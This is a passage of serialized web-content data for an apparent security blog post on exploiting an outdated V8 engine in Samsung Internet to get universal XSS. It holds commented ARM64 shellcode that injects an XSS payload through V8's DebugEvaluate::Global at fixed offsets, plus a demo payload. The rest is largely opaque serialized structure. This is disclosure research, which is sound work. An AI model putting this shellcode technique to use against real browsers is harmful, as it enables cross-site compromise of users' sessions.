payload\n",{"type":26,"tag":137,"props":143975,"children":143976},{"class":5559,"line":6355},[143977],{"type":26,"tag":137,"props":143978,"children":143979},{},[143980],{"type":32,"value":142325},{"type":26,"tag":137,"props":143982,"children":143983},{"class":5559,"line":6363},[143984],{"type":26,"tag":137,"props":143985,"children":143986},{},[143987],{"type":32,"value":143988},"mov x1, #{page_align(len(XSS_PAYLOAD))}\n",{"type":26,"tag":137,"props":143990,"children":143991},{"class":5559,"line":6393},[143992],{"type":26,"tag":137,"props":143993,"children":143994},{},[143995],{"type":32,"value":143996},"mov x2, #3\n",{"type":26,"tag":137,"props":143998,"children":143999},{"class":5559,"line":6401},[144000],{"type":26,"tag":137,"props":144001,"children":144002},{},[144003],{"type":32,"value":142348},{"type":26,"tag":137,"props":144005,"children":144006},{"class":5559,"line":6433},[144007],{"type":26,"tag":137,"props":144008,"children":144009},{},[144010],{"type":32,"value":142356},{"type":26,"tag":137,"props":144012,"children":144013},{"class":5559,"line":6441},[144014],{"type":26,"tag":137,"props":144015,"children":144016},{},[144017],{"type":32,"value":142364},{"type":26,"tag":137,"props":144019,"children":144020},{"class":5559,"line":6501},[144021],{"type":26,"tag":137,"props":144022,"children":144023},{},[144024],{"type":32,"value":142372},{"type":26,"tag":137,"props":144026,"children":144027},{"class":5559,"line":11634},[144028],{"type":26,"tag":137,"props":144029,"children":144030},{},[144031],{"type":32,"value":142287},{"type":26,"tag":137,"props":144033,"children":144034},{"class":5559,"line":11652},[144035],{"type":26,"tag":137,"props":144036,"children":144037},{"emptyLinePlaceholder":18},[144038],{"type":32,"value":6276},{"type":26,"tag":137,"props":144040,"children":144041},{"class":5559,"line":11697},[144042],{"type":26,"tag":137,"props":144043,"children":144044},{},[144045],{"type":32,"value":144046},"// write our xss payload to mmapped rw page\n",{"type":26,"tag":137,"props":144048,"children":144049},{"class":5559,"line":11803},[144050],{"type":26,"tag":137,"props":144051,"children":144052},{},[144053],{"type":32,"value":144054},"{write_str(XSS_PAYLOAD, \"x0\")}\n",{"type":26,"tag":137,"props":144056,"children":144057},{"class":5559,"line":26089},[144058],{"type":26,"tag":137,"props":144059,"children":144060},{"emptyLinePlaceholder":18},[144061],{"type":32,"value":6276},{"type":26,"tag":137,"props":144063,"children":144064},{"class":5559,"line":26124},[144065],{"type":26,"tag":137,"props":144066,"children":144067},{},[144068],{"type":32,"value":144069},"// store x11 = XSS_PAYLOAD string\n",{"type":26,"tag":137,"props":144071,"children":144072},{"class":5559,"line":26132},[144073],{"type":26,"tag":137,"props":144074,"children":144075},{},[144076],{"type":32,"value":144077},"mov x11, x0\n",{"type":26,"tag":137,"props":144079,"children":144080},{"class":5559,"line":26140},[144081],{"type":26,"tag":137,"props":144082,"children":144083},{"emptyLinePlaceholder":18},[144084],{"type":32,"value":6276},{"type":26,"tag":137,"props":144086,"children":144087},{"class":5559,"line":26149},[144088],{"type":26,"tag":137,"props":144089,"children":144090},{},[144091],{"type":32,"value":144092},"// pop back isolate pointer\n",{"type":26,"tag":137,"props":144094,"children":144095},{"class":5559,"line":26191},[144096],{"type":26,"tag":137,"props":144097,"children":144098},{},[144099],{"type":32,"value":144100},"ldr x13, [sp], #16\n",{"type":26,"tag":137,"props":144102,"children":144103},{"class":5559,"line":26224},[144104],{"type":26,"tag":137,"props":144105,"children":144106},{"emptyLinePlaceholder":18},[144107],{"type":32,"value":6276},{"type":26,"tag":137,"props":144109,"children":144110},{"class":5559,"line":26232},[144111],{"type":26,"tag":137,"props":144112,"children":144113},{},[144114],{"type":32,"value":142408},{"type":26,"tag":137,"props":144116,"children":144117},{"class":5559,"line":26240},[144118],{"type":26,"tag":137,"props":144119,"children":144120},{},[144121],{"type":32,"value":144122},"// x13 = isolate *\n",{"type":26,"tag":137,"props":144124,"children":144125},{"class":5559,"line":26249},[144126],{"type":26,"tag":137,"props":144127,"children":144128},{},[144129],{"type":32,"value":144130},"// x11 = XSS_PAYLOAD string mmapped region\n",{"type":26,"tag":137,"props":144132,"children":144133},{"class":5559,"line":26325},[144134],{"type":26,"tag":137,"props":144135,"children":144136},{},[144137],{"type":32,"value":144138},"// x10 = v8::String::NewFromUtf8\n",{"type":26,"tag":137,"props":144140,"children":144141},{"class":5559,"line":26358},[144142],{"type":26,"tag":137,"props":144143,"children":144144},{"emptyLinePlaceholder":18},[144145],{"type":32,"value":6276},{"type":26,"tag":137,"props":144147,"children":144148},{"class":5559,"line":26366},[144149],{"type":26,"tag":137,"props":144150,"children":144151},{},[144152],{"type":32,"value":144153},"// call v8::String::NewFromUTF8 with our xss_payload\n",{"type":26,"tag":137,"props":144155,"children":144156},{"class":5559,"line":26374},[144157],{"type":26,"tag":137,"props":144158,"children":144159},{},[144160],{"type":32,"value":144161},"// arg0 = isolate *\n",{"type":26,"tag":137,"props":144163,"children":144164},{"class":5559,"line":26411},[144165],{"type":26,"tag":137,"props":144166,"children":144167},{},[144168],{"type":32,"value":144169},"mov x0, x13\n",{"type":26,"tag":137,"props":144171,"children":144172},{"class":5559,"line":26424},[144173],{"type":26,"tag":137,"props":144174,"children":144175},{},[144176],{"type":32,"value":144177},"// arg1 = char *c_str\n",{"type":26,"tag":137,"props":144179,"children":144180},{"class":5559,"line":26437},[144181],{"type":26,"tag":137,"props":144182,"children":144183},{},[144184],{"type":32,"value":144185},"mov x1, x11\n",{"type":26,"tag":137,"props":144187,"children":144188},{"class":5559,"line":26450},[144189],{"type":26,"tag":137,"props":144190,"children":144191},{},[144192],{"type":32,"value":144193},"// arg2 = type = kNormal\n",{"type":26,"tag":137,"props":144195,"children":144196},{"class":5559,"line":26504},[144197],{"type":26,"tag":137,"props":144198,"children":144199},{},[144200],{"type":32,"value":144201},"mov x2, #0\n",{"type":26,"tag":137,"props":144203,"children":144204},{"class":5559,"line":26513},[144205],{"type":26,"tag":137,"props":144206,"children":144207},{},[144208],{"type":32,"value":144209},"// arg4 = length\n",{"type":26,"tag":137,"props":144211,"children":144212},{"class":5559,"line":34876},[144213],{"type":26,"tag":137,"props":144214,"children":144215},{},[144216],{"type":32,"value":144217},"mov w3, #{len(XSS_PAYLOAD)}\n",{"type":26,"tag":137,"props":144219,"children":144220},{"class":5559,"line":34897},[144221],{"type":26,"tag":137,"props":144222,"children":144223},{},[144224],{"type":32,"value":144225},"// call NewFromUTF8\n",{"type":26,"tag":137,"props":144227,"children":144228},{"class":5559,"line":83553},[144229],{"type":26,"tag":137,"props":144230,"children":144231},{},[144232],{"type":32,"value":144233},"blr x10\n",{"type":26,"tag":137,"props":144235,"children":144236},{"class":5559,"line":83566},[144237],{"type":26,"tag":137,"props":144238,"children":144239},{"emptyLinePlaceholder":18},[144240],{"type":32,"value":6276},{"type":26,"tag":137,"props":144242,"children":144243},{"class":5559,"line":83574},[144244],{"type":26,"tag":137,"props":144245,"children":144246},{},[144247],{"type":32,"value":144248},"// store x14 = String XSS_PAYLOAD\n",{"type":26,"tag":137,"props":144250,"children":144251},{"class":5559,"line":83582},[144252],{"type":26,"tag":137,"props":144253,"children":144254},{},[144255],{"type":32,"value":144256},"mov x14, x0\n",{"type":26,"tag":137,"props":144258,"children":144259},{"class":5559,"line":83590},[144260],{"type":26,"tag":137,"props":144261,"children":144262},{"emptyLinePlaceholder":18},[144263],{"type":32,"value":6276},{"type":26,"tag":137,"props":144265,"children":144266},{"class":5559,"line":83630},[144267],{"type":26,"tag":137,"props":144268,"children":144269},{},[144270],{"type":32,"value":144271},"// store x9 = v8::internal::DebugEvaluate::Global\n",{"type":26,"tag":137,"props":144273,"children":144274},{"class":5559,"line":83638},[144275],{"type":26,"tag":137,"props":144276,"children":144277},{},[144278],{"type":32,"value":144279},"movz x1, #0xe44c\n",{"type":26,"tag":137,"props":144281,"children":144282},{"class":5559,"line":90825},[144283],{"type":26,"tag":137,"props":144284,"children":144285},{},[144286],{"type":32,"value":144287},"movk x1, #0x014e, lsl #16\n",{"type":26,"tag":137,"props":144289,"children":144290},{"class":5559,"line":90833},[144291],{"type":26,"tag":137,"props":144292,"children":144293},{},[144294],{"type":32,"value":144295},"sub x9, x12, x1\n",{"type":26,"tag":137,"props":144297,"children":144298},{"class":5559,"line":104158},[144299],{"type":26,"tag":137,"props":144300,"children":144301},{"emptyLinePlaceholder":18},[144302],{"type":32,"value":6276},{"type":26,"tag":137,"props":144304,"children":144305},{"class":5559,"line":104166},[144306],{"type":26,"tag":137,"props":144307,"children":144308},{},[144309],{"type":32,"value":144310},"// call v8::internal::DebugEvaluate::Global\n",{"type":26,"tag":137,"props":144312,"children":144313},{"class":5559,"line":104174},[144314],{"type":26,"tag":137,"props":144315,"children":144316},{},[144317],{"type":32,"value":144161},{"type":26,"tag":137,"props":144319,"children":144320},{"class":5559,"line":104182},[144321],{"type":26,"tag":137,"props":144322,"children":144323},{},[144324],{"type":32,"value":144169},{"type":26,"tag":137,"props":144326,"children":144327},{"class":5559,"line":104210},[144328],{"type":26,"tag":137,"props":144329,"children":144330},{},[144331],{"type":32,"value":144332},"// arg1 = String *source\n",{"type":26,"tag":137,"props":144334,"children":144335},{"class":5559,"line":106981},[144336],{"type":26,"tag":137,"props":144337,"children":144338},{},[144339],{"type":32,"value":144340},"mov x1, x14\n",{"type":26,"tag":137,"props":144342,"children":144343},{"class":5559,"line":106989},[144344],{"type":26,"tag":137,"props":144345,"children":144346},{},[144347],{"type":32,"value":144348},"// arg2 = mode = kDefault\n",{"type":26,"tag":137,"props":144350,"children":144352},{"class":5559,"line":144351},69,[144353],{"type":26,"tag":137,"props":144354,"children":144355},{},[144356],{"type":32,"value":144201},{"type":26,"tag":137,"props":144358,"children":144360},{"class":5559,"line":144359},70,[144361],{"type":26,"tag":137,"props":144362,"children":144363},{},[144364],{"type":32,"value":144365},"// arg3 = repl_mode = kYes\n",{"type":26,"tag":137,"props":144367,"children":144369},{"class":5559,"line":144368},71,[144370],{"type":26,"tag":137,"props":144371,"children":144372},{},[144373],{"type":32,"value":144374},"mov x3, #0\n",{"type":26,"tag":137,"props":144376,"children":144378},{"class":5559,"line":144377},72,[144379],{"type":26,"tag":137,"props":144380,"children":144381},{"emptyLinePlaceholder":18},[144382],{"type":32,"value":6276},{"type":26,"tag":137,"props":144384,"children":144386},{"class":5559,"line":144385},73,[144387],{"type":26,"tag":137,"props":144388,"children":144389},{},[144390],{"type":32,"value":143887},{"type":26,"tag":118,"props":144392,"children":144394},{"id":144393},"uxss-demo",[144395],{"type":32,"value":144396},"UXSS Demo",{"type":26,"tag":35,"props":144398,"children":144399},{},[144400,144402,144408],{"type":32,"value":144401},"Below is a demo that executes the following UXSS payload: ",{"type":26,"tag":130,"props":144403,"children":144405},{"className":144404},[],[144406],{"type":32,"value":144407},"alert(document.domain); window.location.href = \"https://cor.team/\";",{"type":32,"value":470},{"type":26,"tag":134450,"props":144410,"children":144413},{"className":144411,"controls":18},[144412],"blog-video-responsive",[144414,144415,144419],{"type":32,"value":134448},{"type":26,"tag":134457,"props":144416,"children":144418},{"src":144417,"type":134460},"/posts/mobile-renderer-rce/demo.mp4",[],{"type":32,"value":144420},"\n  Your browser does not support the video tag.\n",{"type":26,"tag":92,"props":144422,"children":144423},{"id":31526},[144424],{"type":32,"value":21540},{"type":26,"tag":35,"props":144426,"children":144427},{},[144428],{"type":32,"value":144429},"Given the complex nature of the modern software ecosystem, it is unsurprising to find core out of date libraries in popular applications. Samsung Internet relied on a six month old version of V8, a JavaScript engine where researchers frequently discover new vulnerabilities, providing us a large window for n-day exploitation.",{"type":26,"tag":35,"props":144431,"children":144432},{},[144433],{"type":32,"value":144434},"While renderer bugs are usually chained with another exploit such as a sandbox escape, we pushed the capabilities of the bug by targeting the weaker Site Isolation mechanism on mobile. As most web pages ran under the same process, we could inject shellcode into the JavaScript interpreter to achieve universal XSS in Samsung Internet browser.",{"type":26,"tag":7949,"props":144436,"children":144437},{},[144438],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":144440},[144441,144445,144448,144458],{"id":31609,"depth":5412,"text":31612,"children":144442},[144443,144444],{"id":134580,"depth":5417,"text":134583},{"id":134663,"depth":5417,"text":134666},{"id":134696,"depth":5412,"text":134699,"children":144446},[144447],{"id":134837,"depth":5417,"text":134691},{"id":134981,"depth":5412,"text":134984,"children":144449},[144450,144451,144452,144453,144454,144455,144456,144457],{"id":134987,"depth":5417,"text":134990},{"id":135444,"depth":5417,"text":135447},{"id":135627,"depth":5417,"text":135630},{"id":135738,"depth":5417,"text":135741},{"id":136015,"depth":5417,"text":136018},{"id":138725,"depth":5417,"text":138728},{"id":142006,"depth":5417,"text":142009},{"id":144393,"depth":5417,"text":144396},{"id":31526,"depth":5412,"text":21540},"content:blog:2026-04-01-patch-gap-to-mobile-renderer-rce.md","blog/2026-04-01-patch-gap-to-mobile-renderer-rce.md","blog/2026-04-01-patch-gap-to-mobile-renderer-rce",{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"author":144463,"image":144464,"isFeatured":18,"onBlogPage":18,"tags":144465,"body":144466,"_type":5433,"_id":5434,"_source":5435,"_file":5436,"_stem":5437,"_extension":5438},[12,13],{"src":15,"width":16,"height":17},[20,21],{"type":23,"children":144467,"toc":149321},[144468,144472,144500,144509,144513,144523,144527,144531,144817,144820,145084,145306,145310,145986,145989,146476,146482,146486,146500,146504,146508,146728,146763,146772,146776,146785,147486,147490,147493,147497,147547,147573,147603,147607,147610,147613,147617,147626,147637,147661,147715,147721,147737,147747,148144,148164,148168,148171,148175,148195,148276,148285,148324,148352,148361,148687,148701,148707,148710,148714,148718,148745,148751,148828,148831,148835,148845,148860,148864,148896,148902,148918,148921,148925,148929,148983,148993,148996,149000,149028,149037,149041,149045,149049,149059,149131,149147,149167,149170,149174,149184,149188,149192,149196,149313,149317],{"type":26,"tag":27,"props":144469,"children":144470},{"id":29},[144471],{"type":32,"value":33},{"type":26,"tag":35,"props":144473,"children":144474},{},[144475,144476,144481,144482,144487,144488,144493,144494,144499],{"type":32,"value":39},{"type":26,"tag":41,"props":144477,"children":144479},{"href":43,"rel":144478},[45],[144480],{"type":32,"value":48},{"type":32,"value":50},{"type":26,"tag":41,"props":144483,"children":144485},{"href":53,"rel":144484},[45],[144486],{"type":32,"value":57},{"type":32,"value":59},{"type":26,"tag":41,"props":144489,"children":144491},{"href":62,"rel":144490},[45],[144492],{"type":32,"value":66},{"type":32,"value":68},{"type":26,"tag":41,"props":144495,"children":144497},{"href":71,"rel":144496},[45],[144498],{"type":32,"value":75},{"type":32,"value":77},{"type":26,"tag":35,"props":144501,"children":144502},{},[144503,144504,144508],{"type":32,"value":82},{"type":26,"tag":84,"props":144505,"children":144506},{},[144507],{"type":32,"value":88},{"type":32,"value":90},{"type":26,"tag":92,"props":144510,"children":144511},{"id":94},[144512],{"type":32,"value":97},{"type":26,"tag":35,"props":144514,"children":144515},{},[144516,144517,144522],{"type":32,"value":102},{"type":26,"tag":41,"props":144518,"children":144520},{"href":105,"rel":144519},[45],[144521],{"type":32,"value":109},{"type":32,"value":111},{"type":26,"tag":35,"props":144524,"children":144525},{},[144526],{"type":32,"value":116},{"type":26,"tag":118,"props":144528,"children":144529},{"id":120},[144530],{"type":32,"value":123},{"type":26,"tag":35,"props":144532,"children":144533},{},[144534,144535,144584,144585,144734,144735,144816],{"type":32,"value":128},{"type":26,"tag":130,"props":144536,"children":144538},{"className":144537},[133,134],[144539],{"type":26,"tag":137,"props":144540,"children":144542},{"className":144541},[140],[144543],{"type":26,"tag":137,"props":144544,"children":144546},{"className":144545,"ariaHidden":146},[145],[144547],{"type":26,"tag":137,"props":144548,"children":144550},{"className":144549},[151],[144551,144555,144560,144565,144570,144574,144579],{"type":26,"tag":137,"props":144552,"children":144554},{"className":144553,"style":157},[156],[],{"type":26,"tag":137,"props":144556,"children":144558},{"className":144557},[162],[144559],{"type":32,"value":165},{"type":26,"tag":137,"props":144561,"children":144563},{"className":144562},[169,170],[144564],{"type":32,"value":173},{"type":26,"tag":137,"props":144566,"children":144568},{"className":144567},[177],[144569],{"type":32,"value":180},{"type":26,"tag":137,"props":144571,"children":144573},{"className":144572,"style":185},[184],[],{"type":26,"tag":137,"props":144575,"children":144577},{"className":144576,"style":190},[169,170],[144578],{"type":32,"value":193},{"type":26,"tag":137,"props":144580,"children":144582},{"className":144581},[197],[144583],{"type":32,"value":200},{"type":32,"value":202},{"type":26,"tag":130,"props":144586,"children":144588},{"className":144587},[133,134],[144589],{"type":26,"tag":137,"props":144590,"children":144592},{"className":144591},[140],[144593],{"type":26,"tag":137,"props":144594,"children":144596},{"className":144595,"ariaHidden":146},[145],[144597,144659,144721],{"type":26,"tag":137,"props":144598,"children":144600},{"className":144599},[151],[144601,144605,144646,144650,144655],{"type":26,"tag":137,"props":144602,"children":144604},{"className":144603,"style":222},[156],[],{"type":26,"tag":137,"props":144606,"children":144608},{"className":144607},[169],[144609,144614],{"type":26,"tag":137,"props":144610,"children":144612},{"className":144611,"style":190},[169,170],[144613],{"type":32,"value":193},{"type":26,"tag":137,"props":144615,"children":144617},{"className":144616},[236],[144618],{"type":26,"tag":137,"props":144619,"children":144621},{"className":144620},[241],[144622],{"type":26,"tag":137,"props":144623,"children":144625},{"className":144624},[246],[144626],{"type":26,"tag":137,"props":144627,"children":144629},{"className":144628,"style":252},[251],[144630],{"type":26,"tag":137,"props":144631,"children":144632},{"style":256},[144633,144637],{"type":26,"tag":137,"props":144634,"children":144636},{"className":144635,"style":262},[261],[],{"type":26,"tag":137,"props":144638,"children":144640},{"className":144639},[267,268,269,270],[144641],{"type":26,"tag":137,"props":144642,"children":144644},{"className":144643},[169,270],[144645],{"type":32,"value":277},{"type":26,"tag":137,"props":144647,"children":144649},{"className":144648,"style":281},[184],[],{"type":26,"tag":137,"props":144651,"children":144653},{"className":144652},[286],[144654],{"type":32,"value":289},{"type":26,"tag":137,"props":144656,"children":144658},{"className":144657,"style":281},[184],[],{"type":26,"tag":137,"props":144660,"children":144662},{"className":144661},[151],[144663,144667,144708,144712,144717],{"type":26,"tag":137,"props":144664,"children":144666},{"className":144665,"style":301},[156],[],{"type":26,"tag":137,"props":144668,"children":144670},{"className":144669},[169],[144671,144676],{"type":26,"tag":137,"props":144672,"children":144674},{"className":144673},[169,170],[144675],{"type":32,"value":173},{"type":26,"tag":137,"props":144677,"children":144679},{"className":144678},[236],[144680],{"type":26,"tag":137,"props":144681,"children":144683},{"className":144682},[241],[144684],{"type":26,"tag":137,"props":144685,"children":144687},{"className":144686},[246],[144688],{"type":26,"tag":137,"props":144689,"children":144691},{"className":144690,"style":252},[251],[144692],{"type":26,"tag":137,"props":144693,"children":144694},{"style":256},[144695,144699],{"type":26,"tag":137,"props":144696,"children":144698},{"className":144697,"style":262},[261],[],{"type":26,"tag":137,"props":144700,"children":144702},{"className":144701},[267,268,269,270],[144703],{"type":26,"tag":137,"props":144704,"children":144706},{"className":144705},[169,270],[144707],{"type":32,"value":344},{"type":26,"tag":137,"props":144709,"children":144711},{"className":144710,"style":348},[184],[],{"type":26,"tag":137,"props":144713,"children":144715},{"className":144714},[353],[144716],{"type":32,"value":356},{"type":26,"tag":137,"props":144718,"children":144720},{"className":144719,"style":348},[184],[],{"type":26,"tag":137,"props":144722,"children":144724},{"className":144723},[151],[144725,144729],{"type":26,"tag":137,"props":144726,"children":144728},{"className":144727,"style":368},[156],[],{"type":26,"tag":137,"props":144730,"children":144732},{"className":144731},[169],[144733],{"type":32,"value":375},{"type":32,"value":377},{"type":26,"tag":130,"props":144736,"children":144738},{"className":144737},[133,134],[144739],{"type":26,"tag":137,"props":144740,"children":144742},{"className":144741},[140],[144743],{"type":26,"tag":137,"props":144744,"children":144746},{"className":144745,"ariaHidden":146},[145],[144747],{"type":26,"tag":137,"props":144748,"children":144750},{"className":144749},[151],[144751,144755],{"type":26,"tag":137,"props":144752,"children":144754},{"className":144753,"style":397},[156],[],{"type":26,"tag":137,"props":144756,"children":144758},{"className":144757},[169],[144759,144764],{"type":26,"tag":137,"props":144760,"children":144762},{"className":144761},[169,406],[144763],{"type":32,"value":409},{"type":26,"tag":137,"props":144765,"children":144767},{"className":144766},[236],[144768],{"type":26,"tag":137,"props":144769,"children":144771},{"className":144770},[241,417],[144772,144805],{"type":26,"tag":137,"props":144773,"children":144775},{"className":144774},[246],[144776,144800],{"type":26,"tag":137,"props":144777,"children":144779},{"className":144778,"style":426},[251],[144780],{"type":26,"tag":137,"props":144781,"children":144782},{"style":430},[144783,144787],{"type":26,"tag":137,"props":144784,"children":144786},{"className":144785,"style":262},[261],[],{"type":26,"tag":137,"props":144788,"children":144790},{"className":144789},[267,268,269,270],[144791],{"type":26,"tag":137,"props":144792,"children":144794},{"className":144793},[169,270],[144795],{"type":26,"tag":137,"props":144796,"children":144798},{"className":144797},[169,270],[144799],{"type":32,"value":449},{"type":26,"tag":137,"props":144801,"children":144803},{"className":144802},[453],[144804],{"type":32,"value":456},{"type":26,"tag":137,"props":144806,"children":144808},{"className":144807},[246],[144809],{"type":26,"tag":137,"props":144810,"children":144812},{"className":144811,"style":464},[251],[144813],{"type":26,"tag":137,"props":144814,"children":144815},{},[],{"type":32,"value":470},{"type":26,"tag":472,"props":144818,"children":144819},{},[],{"type":26,"tag":35,"props":144821,"children":144822},{},[144823,144824,144849,144850,144927,144928,145005,145006,145083],{"type":32,"value":479},{"type":26,"tag":130,"props":144825,"children":144827},{"className":144826},[133,134],[144828],{"type":26,"tag":137,"props":144829,"children":144831},{"className":144830},[140],[144832],{"type":26,"tag":137,"props":144833,"children":144835},{"className":144834,"ariaHidden":146},[145],[144836],{"type":26,"tag":137,"props":144837,"children":144839},{"className":144838},[151],[144840,144844],{"type":26,"tag":137,"props":144841,"children":144843},{"className":144842,"style":499},[156],[],{"type":26,"tag":137,"props":144845,"children":144847},{"className":144846},[169,170],[144848],{"type":32,"value":506},{"type":32,"value":508},{"type":26,"tag":130,"props":144851,"children":144853},{"className":144852},[133,134],[144854],{"type":26,"tag":137,"props":144855,"children":144857},{"className":144856},[140],[144858],{"type":26,"tag":137,"props":144859,"children":144861},{"className":144860,"ariaHidden":146},[145],[144862],{"type":26,"tag":137,"props":144863,"children":144865},{"className":144864},[151],[144866,144870],{"type":26,"tag":137,"props":144867,"children":144869},{"className":144868,"style":528},[156],[],{"type":26,"tag":137,"props":144871,"children":144873},{"className":144872},[169],[144874,144879],{"type":26,"tag":137,"props":144875,"children":144877},{"className":144876,"style":537},[169,170],[144878],{"type":32,"value":540},{"type":26,"tag":137,"props":144880,"children":144882},{"className":144881},[236],[144883],{"type":26,"tag":137,"props":144884,"children":144886},{"className":144885},[241,417],[144887,144916],{"type":26,"tag":137,"props":144888,"children":144890},{"className":144889},[246],[144891,144911],{"type":26,"tag":137,"props":144892,"children":144894},{"className":144893,"style":556},[251],[144895],{"type":26,"tag":137,"props":144896,"children":144897},{"style":560},[144898,144902],{"type":26,"tag":137,"props":144899,"children":144901},{"className":144900,"style":262},[261],[],{"type":26,"tag":137,"props":144903,"children":144905},{"className":144904},[267,268,269,270],[144906],{"type":26,"tag":137,"props":144907,"children":144909},{"className":144908},[169,170,270],[144910],{"type":32,"value":506},{"type":26,"tag":137,"props":144912,"children":144914},{"className":144913},[453],[144915],{"type":32,"value":456},{"type":26,"tag":137,"props":144917,"children":144919},{"className":144918},[246],[144920],{"type":26,"tag":137,"props":144921,"children":144923},{"className":144922,"style":464},[251],[144924],{"type":26,"tag":137,"props":144925,"children":144926},{},[],{"type":32,"value":592},{"type":26,"tag":130,"props":144929,"children":144931},{"className":144930},[133,134],[144932],{"type":26,"tag":137,"props":144933,"children":144935},{"className":144934},[140],[144936],{"type":26,"tag":137,"props":144937,"children":144939},{"className":144938,"ariaHidden":146},[145],[144940],{"type":26,"tag":137,"props":144941,"children":144943},{"className":144942},[151],[144944,144948],{"type":26,"tag":137,"props":144945,"children":144947},{"className":144946,"style":612},[156],[],{"type":26,"tag":137,"props":144949,"children":144951},{"className":144950},[169],[144952,144957],{"type":26,"tag":137,"props":144953,"children":144955},{"className":144954,"style":621},[169,170],[144956],{"type":32,"value":624},{"type":26,"tag":137,"props":144958,"children":144960},{"className":144959},[236],[144961],{"type":26,"tag":137,"props":144962,"children":144964},{"className":144963},[241,417],[144965,144994],{"type":26,"tag":137,"props":144966,"children":144968},{"className":144967},[246],[144969,144989],{"type":26,"tag":137,"props":144970,"children":144972},{"className":144971,"style":556},[251],[144973],{"type":26,"tag":137,"props":144974,"children":144975},{"style":643},[144976,144980],{"type":26,"tag":137,"props":144977,"children":144979},{"className":144978,"style":262},[261],[],{"type":26,"tag":137,"props":144981,"children":144983},{"className":144982},[267,268,269,270],[144984],{"type":26,"tag":137,"props":144985,"children":144987},{"className":144986},[169,170,270],[144988],{"type":32,"value":506},{"type":26,"tag":137,"props":144990,"children":144992},{"className":144991},[453],[144993],{"type":32,"value":456},{"type":26,"tag":137,"props":144995,"children":144997},{"className":144996},[246],[144998],{"type":26,"tag":137,"props":144999,"children":145001},{"className":145000,"style":464},[251],[145002],{"type":26,"tag":137,"props":145003,"children":145004},{},[],{"type":32,"value":675},{"type":26,"tag":130,"props":145007,"children":145009},{"className":145008},[133,134],[145010],{"type":26,"tag":137,"props":145011,"children":145013},{"className":145012},[140],[145014],{"type":26,"tag":137,"props":145015,"children":145017},{"className":145016,"ariaHidden":146},[145],[145018],{"type":26,"tag":137,"props":145019,"children":145021},{"className":145020},[151],[145022,145026],{"type":26,"tag":137,"props":145023,"children":145025},{"className":145024,"style":612},[156],[],{"type":26,"tag":137,"props":145027,"children":145029},{"className":145028},[169],[145030,145035],{"type":26,"tag":137,"props":145031,"children":145033},{"className":145032},[169,170],[145034],{"type":32,"value":705},{"type":26,"tag":137,"props":145036,"children":145038},{"className":145037},[236],[145039],{"type":26,"tag":137,"props":145040,"children":145042},{"className":145041},[241,417],[145043,145072],{"type":26,"tag":137,"props":145044,"children":145046},{"className":145045},[246],[145047,145067],{"type":26,"tag":137,"props":145048,"children":145050},{"className":145049,"style":556},[251],[145051],{"type":26,"tag":137,"props":145052,"children":145053},{"style":430},[145054,145058],{"type":26,"tag":137,"props":145055,"children":145057},{"className":145056,"style":262},[261],[],{"type":26,"tag":137,"props":145059,"children":145061},{"className":145060},[267,268,269,270],[145062],{"type":26,"tag":137,"props":145063,"children":145065},{"className":145064},[169,170,270],[145066],{"type":32,"value":506},{"type":26,"tag":137,"props":145068,"children":145070},{"className":145069},[453],[145071],{"type":32,"value":456},{"type":26,"tag":137,"props":145073,"children":145075},{"className":145074},[246],[145076],{"type":26,"tag":137,"props":145077,"children":145079},{"className":145078,"style":464},[251],[145080],{"type":26,"tag":137,"props":145081,"children":145082},{},[],{"type":32,"value":755},{"type":26,"tag":35,"props":145085,"children":145086},{},[145087,145088,145092,145093,145196,145197,145300,145301,145305],{"type":32,"value":760},{"type":26,"tag":762,"props":145089,"children":145090},{},[145091],{"type":32,"value":766},{"type":32,"value":768},{"type":26,"tag":130,"props":145094,"children":145096},{"className":145095},[133,134],[145097],{"type":26,"tag":137,"props":145098,"children":145100},{"className":145099},[140],[145101],{"type":26,"tag":137,"props":145102,"children":145104},{"className":145103,"ariaHidden":146},[145],[145105,145183],{"type":26,"tag":137,"props":145106,"children":145108},{"className":145107},[151],[145109,145113,145170,145174,145179],{"type":26,"tag":137,"props":145110,"children":145112},{"className":145111,"style":788},[156],[],{"type":26,"tag":137,"props":145114,"children":145116},{"className":145115},[169],[145117,145122],{"type":26,"tag":137,"props":145118,"children":145120},{"className":145119,"style":190},[169,170],[145121],{"type":32,"value":799},{"type":26,"tag":137,"props":145123,"children":145125},{"className":145124},[236],[145126],{"type":26,"tag":137,"props":145127,"children":145129},{"className":145128},[241,417],[145130,145159],{"type":26,"tag":137,"props":145131,"children":145133},{"className":145132},[246],[145134,145154],{"type":26,"tag":137,"props":145135,"children":145137},{"className":145136,"style":815},[251],[145138],{"type":26,"tag":137,"props":145139,"children":145140},{"style":819},[145141,145145],{"type":26,"tag":137,"props":145142,"children":145144},{"className":145143,"style":262},[261],[],{"type":26,"tag":137,"props":145146,"children":145148},{"className":145147},[267,268,269,270],[145149],{"type":26,"tag":137,"props":145150,"children":145152},{"className":145151,"style":832},[169,170,270],[145153],{"type":32,"value":835},{"type":26,"tag":137,"props":145155,"children":145157},{"className":145156},[453],[145158],{"type":32,"value":456},{"type":26,"tag":137,"props":145160,"children":145162},{"className":145161},[246],[145163],{"type":26,"tag":137,"props":145164,"children":145166},{"className":145165,"style":464},[251],[145167],{"type":26,"tag":137,"props":145168,"children":145169},{},[],{"type":26,"tag":137,"props":145171,"children":145173},{"className":145172,"style":281},[184],[],{"type":26,"tag":137,"props":145175,"children":145177},{"className":145176},[286],[145178],{"type":32,"value":289},{"type":26,"tag":137,"props":145180,"children":145182},{"className":145181,"style":281},[184],[],{"type":26,"tag":137,"props":145184,"children":145186},{"className":145185},[151],[145187,145191],{"type":26,"tag":137,"props":145188,"children":145190},{"className":145189,"style":368},[156],[],{"type":26,"tag":137,"props":145192,"children":145194},{"className":145193},[169],[145195],{"type":32,"value":878},{"type":32,"value":880},{"type":26,"tag":130,"props":145198,"children":145200},{"className":145199},[133,134],[145201],{"type":26,"tag":137,"props":145202,"children":145204},{"className":145203},[140],[145205],{"type":26,"tag":137,"props":145206,"children":145208},{"className":145207,"ariaHidden":146},[145],[145209,145287],{"type":26,"tag":137,"props":145210,"children":145212},{"className":145211},[151],[145213,145217,145274,145278,145283],{"type":26,"tag":137,"props":145214,"children":145216},{"className":145215,"style":788},[156],[],{"type":26,"tag":137,"props":145218,"children":145220},{"className":145219},[169],[145221,145226],{"type":26,"tag":137,"props":145222,"children":145224},{"className":145223,"style":190},[169,170],[145225],{"type":32,"value":799},{"type":26,"tag"